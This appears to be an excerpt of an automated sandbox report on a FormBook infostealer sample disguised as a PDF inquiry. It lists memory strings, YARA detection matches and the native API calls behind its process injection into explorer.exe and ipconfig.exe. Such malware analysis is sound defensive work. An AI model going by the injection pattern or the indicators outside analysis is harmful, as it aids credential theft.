Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4
Source: INQUIRY 1820521 pdf.exe	String found in binary or memory: http://weather.gc.ca/astro/seeing_e.html)
Source: explorer.exe, 0000000A.00000002.909308759.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com11
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.com?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comTC
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.comTCV
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.come7
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coms-c
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.651191297.000000000868E000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.c
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn0A
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnCg
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnD
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnP
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647266371.000000000868A000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cna
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnl
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cnu-e
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.founder.com.c~
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr-e
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.krs-cz
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.651699352.0000000008690000.00000004.00000001.sdmp	String found in binary or memory: http://www.monotype.5;M
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr?
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.krim
Source: explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.comTZ
Source: INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp	String found in binary or memory: http://www.tiro.coms
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%22xinghai-nb.com%22
Source: ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp	String found in binary or memory: https://www.sogou.com/web?query=%22xinghai-nb.com%22&ie=utf8

Source: INQUIRY 1820521 pdf.exe, 00000000.00000002.680653424.00000000015D8000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419D60 NtCreateFile,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419E10 NtReadFile,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419E90 NtClose,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419F40 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419D5E NtCreateFile,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419E8C NtClose,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00419F3A NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015799A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015798F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015795D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015797A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015796E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579950 NtQueueApcThread,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015799D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0157B040 NtSuspendThread,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579820 NtEnumerateKey,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015798A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579B00 NtSetValueKey,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0157A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579A10 NtQuerySection,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579560 NtWriteFile,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0157AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015795F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0157A770 NtOpenThread,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579770 NtSetInformationFile,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579760 NtOpenProcess,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0157A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579FE0 NtCreateMutant,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579650 NtQueryValueKey,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01579610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015796D0 NtCreateKey,
Source: C:\Windows\explorer.exe	Code function: 10_2_04DFAA32 NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032BA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032BA770 NtOpenThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032BA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9A20 NtResumeThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9A80 NtOpenDirectoryObject,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9520 NtWaitForSingleObject,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032BAD30 NtSetContextThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9560 NtWriteFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9950 NtQueueApcThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B95F0 NtQueryInformationFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B99D0 NtCreateProcessEx,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B9820 NtEnumerateKey,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032BB040 NtSuspendThread,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B98A0 NtWriteVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_032B98F0 NtReadVirtualMemory,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A19D60 NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A19E90 NtClose,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A19E10 NtReadFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A19D5E NtCreateFile,
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 16_2_00A19E8C NtClose,

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01592140
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01590470
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01590FD0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_0159EE68
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01593078
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01591779
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_0159BF40
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01594AD8
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01594AC9
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01592F78
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01590F72
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01590F29
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01590ED1
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01595148
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01595139
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01595359
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01595368
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01595610
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01595600
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01593F48
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_01593F38
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_0159BF30
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_05673794
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_05679BC0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_056701F0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_056737E7
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 0_2_05673788
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00401029
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00401030
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00402D87
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00402D90
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00409E40
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00409E3B
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_00402FB0
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0153F900
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_01554120
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0160E824
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_015F1002
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_016028EC
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_0154B090
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Code function: 9_2_016020A8
